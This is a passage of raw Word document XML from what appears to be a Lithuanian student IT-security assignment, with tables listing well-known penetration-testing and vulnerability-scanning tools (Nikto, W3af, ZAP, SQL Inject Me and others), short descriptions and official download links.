        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9634" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1090"/>
        <w:gridCol w:w="1657"/>
        <w:gridCol w:w="6887"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="750A1947" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="00ED49DA" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2A36F2D8" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6887" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="190F24F9" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="11E2269D" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F78BB2C" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B13C8E" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Nexpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6887" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B6D0EEB" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Saugumo trukumu ir rizikos sumazinimo įrankis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="147650D6" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF01553" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="346EE526" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6887" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D59AE09" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Web serverių ir aplikacijų saugumo trūkumo skaneris</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6739CF00" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A07D2BF" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="392CBB49" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>W3af</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6887" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0419A774" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Hakinimo irankiai, web aplikacijos atakai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4E5BA889" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FC7263E" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0612D9F1" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>secapp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6887" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C3F959F" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Web aplikacijų saugumo testavimo įrankis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00465D5F" w:rsidRPr="005A5C28" w14:paraId="727C90F9" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1090" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5D7D51" w14:textId="77777777" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="769D5554" w14:textId="59C3BDFB" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="0080767C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>Etherape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6887" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CDF6D9B" w14:textId="6795B29D" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00F239F4" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:t>EtherApe yra grafinis tinklo monitorius UNIX sistemoms. Jis grafiškai rodo tinklo veiklą.‎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="343A2A11" w14:textId="54A88C11" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A4A6D5" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Hlk67842261"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">12 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PATEIKITE SĄRAŠĄ PENKIŲ PROGRAMINIŲ ĮRANGŲ, SKIRTŲ ATSPARUMO TESTAVIMUI (ANGL. PENETRATION TESTING TOOLS). PATEIKITE TRUMPUS APRAŠUS IR TIESIOGINES PARSISUNTIMO NUORODAS. UŽPILDYKITE LENTELĘ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F8A39" w14:textId="77777777" w:rsidR="00A95FDE" w:rsidRPr="005A5C28" w:rsidRDefault="00A95FDE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="78DC9B53" w14:textId="77777777" w:rsidR="001A2230" w:rsidRPr="005A5C28" w:rsidRDefault="001A2230"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AI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9916" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="704"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="4395"/>
        <w:gridCol w:w="3258"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7A2A10F2" w14:textId="77777777" w:rsidTr="677D82DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C5BC907" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Eil. Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="683C0FCC" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6336E17E" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aprašas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B759D8D" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Parsisiuntimo nuoroda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4F6B0C21" w14:textId="77777777" w:rsidTr="677D82DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AD9153E" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3510B2C8" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>SQL Inject Me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CA77287" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‎‎Dauguma žmonių yra susipažinę su SQL injekcijos, nes ji yra paplitusi ir daro didelį poveikiį.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE19703" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>https://addons.mozilla.org/en-US/firefox/addon/7597/eula/88410?src=collection&amp;collection_id=203cc10a-26b3-5921-12ef-6ba80b06fe07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3A769DEC" w14:textId="77777777" w:rsidTr="677D82DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58BD371D" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF8274D" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6408B805" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Cross-Site Scripting (XSS). ‎Zed Attack </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Proxy (ZAP), taip pat OWASP projektas, yra "paprasta naudoti integruotą skverbties testavimo įrankis ieškant pažeidžiamumą interneto programų‎</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3258" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D888C2E" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>https://www.zaproxy.org/download/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0F7A1760" w14:textId="77777777" w:rsidTr="677D82DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73953F12" w14:textId="77777777" w:rsidR="00D860D7" w:rsidRPr="005A5C28" w:rsidRDefault="714ABDEC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
